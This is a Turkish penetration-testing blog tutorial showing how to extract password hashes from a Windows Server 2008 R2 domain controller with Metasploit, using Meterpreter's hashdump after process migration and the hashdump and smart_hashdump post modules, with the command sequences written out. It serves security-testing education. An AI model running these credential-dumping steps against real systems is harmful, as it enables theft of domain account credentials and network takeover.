Etki Alanı Denetleyicisi Üzerindeki Kullanıcı Hesaplarına Ait Parola Özetlerinin Metasploit ile Elde Edilmesi

Yazarı:
Ertuğrul BAŞARANOĞLU
-
0
303
views
Windows sızma testleri sırasında Metasploit tarafından sunulan komut ve modüllerle yerel hesapların parola özetleri elde edilebilir. Bu yazıda Meterpreter “hashdump” komutu, MSF “hashdump” post modülü ve MSF “smart_hashdump” post modülü ile etki alanı denetleyicisinde bulunan hesaplara ait parola özetlerinin elde edilmesi incelenecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Yazıda incelenecek olan bilgisayar 64 bitlik Windows Server 2008 R2 işletim sistemi olup, etki alanı denetleyicisi rolündedir. Bu bilgisayarda elde edilen Meterpreter bağlantısı aşağıda belirtildiği gibidir. Meterpreter bağlantısının 32 bitlik rundll32.exe adlı proses üzerinden SYSTEM haklarıyla elde edildiği görülmektedir.

ps -s
getuid
getpid

obtaining-password-hashes-of-users-on-windows-2008-r2-domain-controller-using-metasploit-framework-01

Her bir başlıkta incelenecek olan tekniğin çıktısı bir biri ile bağımsız olduğu, ardışık bir şekilde listelenmediği göz önünce bulundurulmalıdır.

 

Meterpreter “hashdump” Komutu

Proses 32 bit ve işletim sistemi 64 bit olduğu için, Meterpreter “hashdump” komutunun mevcut durumda çalışmadığı görülmektedir. Bunun yanında, 64 bitlik SYSTEM yetkileri ile çalışan bir prosese sıçrandığında ise Meterpreter “hashdump” komutu ile parola özetlerinin elde edilebildiği görülmektedir.

hashdump
migrate 1840
hashdump

obtaining-password-hashes-of-users-on-windows-2008-r2-domain-controller-using-metasploit-framework-02

 

MSF “hashdump” Post Modülü

MSF “hashdump” post modülü ile parola özetlerini elde edebilmek için MSF komut satırına erişim sağlanmalıdır. MSF “hashdump” post modülünün seçenekleri aşağıdaki gibidir.

background
search hashdump type:post platform:windows
use post/windows/gather/hashdump
show options

obtaining-password-hashes-of-users-on-windows-2008-r2-domain-controller-using-metasploit-framework-03

MSF “hashdump” post modülünün çıktısı aşağıdaki gibi elde edilebilir.

set SESSION 1
show options
run

obtaining-password-hashes-of-users-on-windows-2008-r2-domain-controller-using-metasploit-framework-04

MSF “hashdump” post modülü, Meterpreter komut satırında iken de çağırılabilir.

run hashdump

obtaining-password-hashes-of-users-on-windows-2008-r2-domain-controller-using-metasploit-framework-05

Uyarı: Etki alanı denetleyicisi üzerinde iken, MSF “hashdump” post modülü ile doğru sonuç elde edilemeyebildiği görülmektedir.

 

MSF “smart_hashdump” Post Modülü

MSF “smart_hashdump” post modülü ile parola özetlerini elde edebilmek için MSF komut satırına erişim sağlanmalıdır. MSF “smart_hashdump” post modülünün seçenekleri aşağıdaki gibidir.

background
search hashdump type:post platform:windows
use post/windows/gather/smart_hashdump
show options

obtaining-password-hashes-of-users-on-windows-2008-r2-domain-controller-using-metasploit-framework-06

MSF “smart_hashdump” post modülünün çıktısı aşağıdaki gibi elde edilebilir.

set SESSION 1
show options
run

obtaining-password-hashes-of-users-on-windows-2008-r2-domain-controller-using-metasploit-framework-07

MSF “smart_hashdump” post modülü, Meterpreter komut satırında iken de çağırılabilir.

run post/windows/gather/smart_hashdump

obtaining-password-hashes-of-users-on-windows-2008-r2-domain-controller-using-metasploit-framework-08

 

 

İlişkili Yazılar:
Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Benzer YazılarYAZARIN DİĞER İÇERİKLERİ

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.